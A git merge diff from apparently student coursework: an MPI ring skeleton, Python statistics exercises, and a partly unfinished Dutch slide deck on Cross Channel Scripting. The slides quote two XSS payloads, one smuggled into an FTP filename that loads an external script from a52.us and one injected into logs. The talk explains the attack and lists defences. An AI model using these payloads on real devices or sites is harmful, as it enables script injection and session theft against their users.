Merge branch 'master' of vo20.nl:/git/uva

graphics/ass8/.gitignore

 main (copy).c
+main

modsim/ass4_taddeus/.gitignore

+ring

modsim/ass4_taddeus/Makefile

+CC=mpicc
+CFLAGS=-Wall -Wextra -pedantic -std=c99 -O2
+
+all: ring
+ring: ring.o
+
+clean:
+	rm -vf *.o ring

modsim/ass4_taddeus/ring.c

+#include <stdlib.h>
+#include <stdio.h>
+#include <mpi.h>
+
+int main(int argc, char **argv) {
+    MPI_Init(&argc, &argv);
+
+
+
+    MPI_Finalize();
+}

modsim/ass4_taddeus/ring.sh

+#!/bin/sh
+NUM_PROCESSES=4
+RSH_AGENT=rsh
+MPI_HOSTFILE=~/.mpirun.machines
+PROGRAM_EXEC=ring
+
+mpirun -np $NUM_PROCESSES --mca pls_rsh_agent $RSH_AGENT \
+    --hostfile $MPI_HOSTFILE $PROGRAM_EXEC

portfolio/xcs/Makefile

+all: xcs.pdf
+
+xcs.pdf: xcs.tex
+	pdflatex xcs
+	pdflatex xcs
+
+clean:
+	rm -v *.out *.aux *.toc xcs.pdf
+

portfolio/xcs/xcs.tex

+\documentclass{beamer}
+\usepackage[english,dutch]{babel}
+\usepackage{url,verbatim,graphicx}
+
+\title{The emergence of Cross Channel Scripting}
+\author{Tadde\"us Kroes}
+
+\begin{document}
+
+\frame
+{
+	\titlepage
+}
+
+\frame
+{
+	\tableofcontents
+}
+
+\section{Introductie Cross Site Scripting}
+
+\frame
+{
+	\frametitle{Cross Site Scripting (XSS)}
+
+	\begin{itemize}
+		\item Invoegen van scripts op een webpagina door slechte validatie
+		\item Web to web
+		\item presistent of non-persistent
+	\end{itemize}
+}
+
+\frame
+{
+	\frametitle{Cross Site Scripting: een simpel voorbeeld}
+
+    \begin{figure}
+        \includegraphics{1-infect.png}
+        \caption{Aanvaller voert een script dat de sessie uitleest}
+    \end{figure}
+}
+
+\frame
+{
+	\frametitle{Cross Site Scripting: een simpel voorbeeld (2)}
+
+    \begin{figure}
+        \includegraphics[scale=.7]{2-visit.png}
+        \caption{Gebruiker bezoekt pagina, script wordt uitgevoerd}
+    \end{figure}
+}
+
+\section{Cross Channel Scripting}
+
+\subsection{Introductie}
+
+\frame[containsverbatim]
+{
+	\frametitle{Cross Channel Scripting (XCS)}
+
+	\begin{itemize}
+		\item Non-web to web
+		\item Infectie gaat over een andere ``channel'' dan executie:
+		\begin{verbatim}
+aanvaller -> protocol A -> service A  # infectie
+                               |
+doewit    <- protocol B <- service B  # executie
+		\end{verbatim}
+		\item Persistent
+	    \item Twee op zichzelf veilige services A en B zijn samen onveilig
+	    \item Moeilijker te detecteren dan XSS
+	\end{itemize}
+}
+
+\frame
+{
+	\frametitle{Voorbeeld XSC: FTP exploit}
+
+    Een apparaat upload bestanden naar web-interface, kunnen we een script
+    meesturen in de bestandsnaam? \\
+    \vspace{4mm}
+    \textbf{Uitdagingen}
+	\begin{itemize}
+		\item Bestandsnaam heeft beperkte lengte
+		\item Bestandsnamen kunnen geen '/' bevatten
+	\end{itemize}
+}
+
+\frame[containsverbatim]
+{
+	\frametitle{Voorbeeld XSC: FTP exploit (2)}
+
+    \begin{verbatim}
+    "<iframe onload='javascript:document.write(
+    &apos;<html><head><&#47;head><body><script src
+    =&quot;http&#58;&#47;a52.us&#47;t2.js&quot;>
+    <&#47;script><&#47;body><&#47;html>&apos;);'
+    src='index.htm'>"
+    \end{verbatim}
+
+	\begin{itemize}
+	    \item Laad een extern script \url{http://a52.us/t2.js} (van
+	          willekeurige lengte)
+	    \item Splits eventueel over meerdere bestandsnamen
+	    \item Pas HTML escaping toe om '/' te vervangen
+	    \item Gebruik iframe \texttt{onload}-event voor omzeilen van
+	          character set
+	\end{itemize}
+}
+
+\subsection{Voorbeeld: Log-based XCS}
+
+\frame[containsverbatim]
+{
+	\frametitle{Voorbeeld: Log-based XCS}
+
+	\begin{verbatim}
+	r","","");\\/--></script><script src="http://xxx"></script>
+	\end{verbatim}
+}
+
+\section{Reverse XCS}
+
+\frame
+{
+	\frametitle{Reverse XCS}
+
+	\begin{itemize}
+		\item Web to non-web
+		\item
+	\end{itemize}
+}
+
+\frame
+{
+	\frametitle{Voorbeeld RXCS: The ghost in the photo frame}
+
+
+    \vspace{4mm}
+    \textbf{Uitdagingen}
+	\begin{itemize}
+		\item
+		\item
+	\end{itemize}
+}
+
+\frame
+{
+	\frametitle{RESTful RXCS}
+
+	\begin{itemize}
+		\item
+	\end{itemize}
+}
+
+\section{Beveiliging}
+
+\frame
+{
+	\frametitle{Beveiliging}
+
+	\begin{itemize}
+		\item Encoding/escaping
+		\item Valideren van onvertrouwde HTML-uitvoer
+		\item Cookies
+		\item Blokkeren van scripts door gebruiker
+	\end{itemize}
+}
+
+\section{Conclusie}
+
+\frame
+{
+	\frametitle{Conclusie}
+
+	\begin{itemize}
+		\item
+	\end{itemize}
+}
+
+\frame
+{
+	\frametitle{Meer informatie}
+
+	\begin{itemize}
+		\item \url{http://en.wikipedia.org/wiki/Cross-site\_scripting}
+	\end{itemize}
+}
+
+\end{document}

statred/ass1/Makefile

-.PHONY: all clean
-
-all:
-
-clean:
-	rm -vf *.pyc q*.pdf

statred/ass1/q21_multivariate.py

 from pylab import array, eig, diagflat, dot, sqrt, randn, tile, \
-        plot, subplot, axis, figure, clf, savefig
+        plot, subplot, axis, figure, clf, show
 
 # The used mu (mean vector) and cov (covariance matrix).
 mu = array([[3],
@@ -18,7 +18,8 @@ cov  = array(
 samples = 1000
 vector_size = 4
 
-def dataset():
+def dataset(samples):
+    """Generate a dataset, consisting of a soecified number of random vectors."""
     # The covariance matrix is used to transform the generated dataset into a
     # multivariant normal distribution dataset.
     d, U = eig(cov)
@@ -31,12 +32,12 @@ if __name__ == '__main__':
     # Create a n*n grid of subplots and generate a new dataset.
     figure(vector_size**2)
     clf()
-    Y = dataset()
+    Y = dataset(samples)
     for i in range(vector_size):
         for j in range(vector_size):
             # Skip the diagonal subplots since those are irrelevant.
             if i != j:
-                subplot(vector_size, vector_size, (i+1) + j*vector_size)
+                subplot(vector_size, vector_size, (i + 1) + j * vector_size)
                 plot(Y[i], Y[j], 'x')
                 axis('equal')
-    savefig('q21.pdf')
+    show()

statred/ass1/q22_estimate.py

-from q21_multivariate import dataset
+from sys import argv, exit
+from q21_multivariate import mu, cov, dataset
 from pylab import array, mean, tile, newaxis, dot, eigvals, \
-        axis, figure, clf, show, plot
+        axis, figure, clf, show, plot, sum
 
-def eigenvalues(n):
-    """Return eigenvalues of unbiased estimators for the covariance matrix
-    Sigma (based on a pseudo-random generated dataset)."""
+if len(argv) == 3:
+    step = int(argv[2])
+elif len(argv) == 2:
+    step = 100
+else:
+    print 'Usage: python %s SAMPLES [ STEP_SIZE ]' % (argv[0])
+    exit()
 
-    Y = array([mean(dataset(), 1) for i in range(n)]).T
+# `samples' is the size of the generated dataset.
+samples = int(argv[1])
+Y = dataset(samples)
 
+def estimate(n):
+    """Return eigenvalues of unbiased estimators for the covariance matrix
+    Sigma (based on a pseudo-random generated dataset)."""
     # Sigma = 1 / (n - 1) * Sum for i=1 to n: (x_i - x_mean) T(x_i - x_mean),
     # where T(x) is the transpose of `x'. Mu = x_mean and
     # Yzm = Sum for i=1 to n: x_i - x_mean.
-    mu = mean(Y, 1)
-    Yzm = Y - tile(mu[:,newaxis], n)
-    S = dot(Yzm, Yzm.T) / (n - 1)
-    return eigvals(S)
+    sliced = [Y[i][:n] for i in range(len(Y))]
+    est_mu = mean(sliced, 1)
+    Yzm = sliced - tile(est_mu[:,newaxis], n)
+    est_cov = dot(Yzm, Yzm.T) / (n - 1)
+    return (est_mu, est_cov)
 
 figure(1)
 clf()
 
-max_range = 10000
-
-samples = range(2, max_range, 500)
-data = [[] for i in range(4)]
-
-for n in samples:
-    e = eigenvalues(n)
-    for i in range(4):
-        data[i].append(e[i])
-for i in range(4):
-    plot(samples, data[i], 'x')
-axis([0, max_range, 0., 0.025])
+# Part 1 - Estimate mu and cov, experiment with various sizes of datasets.
+# We use steps of 100 for the number of used samples.
+X = range(step, samples + 1, step)
+diff_mu = []
+diff_cov = []
+estimated_mu = []
+for n in X:
+    est_mu, est_cov = estimate(n)
+    diff_mu.append(abs(sum(est_mu - mu)))
+    diff_cov.append(abs(sum(est_cov - cov)))
+    estimated_mu.append(est_mu)
+plot(X, diff_mu)
+plot(X, diff_cov)
+# Observe in the following graph that the accuracy increases when more
+# vectors from the generated dataset are used. There are some fluctuations due
+# to the randomness of the dataset, but the difference lines should converge to
+# zero.
 show()
+
+# Part 2 - Calculate covariance of estimated mu.
+sample_count = len(estimated_mu)
+estimated_mu = array(estimated_mu).T
+m = mean(estimated_mu, 1)
+Yzm = estimated_mu - tile(m[:,newaxis], sample_count)
+S = dot(Yzm, Yzm.T) / (samples - 1)
+# When many samples are used to calculate the estimators, the estimators will
+# converge to the original values. The more samples are uses each time, the more
+# convergence will occur, which will lead to smaller eigenvalues of the
+# covariance matrix (printed below). For example, call the program with 1000 and
+# 10000 samples and you will see that the eigenvalues will be smaller with 10000
+# samples.
+print eigvals(S)

statred/ass1/q23_iris.py

-from pylab import loadtxt, figure, plot, subplot, axis, clf, savefig
+from pylab import loadtxt, figure, plot, subplot, axis, clf, show
 
 # The last column of the data sets is a label, which is used to distinguish the
 # three groups of data in the data sets. This label should be translated to a
@@ -28,4 +28,8 @@ for i in range(4):
             for c in range(3):
                 tmp = zip(*graph_data[i + j*4][c])
                 plot(tmp[0], tmp[1], 'x' + colors[c])
-savefig('q23.pdf')
+# In the following plot, we can see that the colored areas do not overlap in
+# the same place in all subplots. Thus, using all plots, we could probably
+# classify a given data point to one of the iris classes (except for some points
+# in the blue/green areas, these overlap much in a small area).
+show()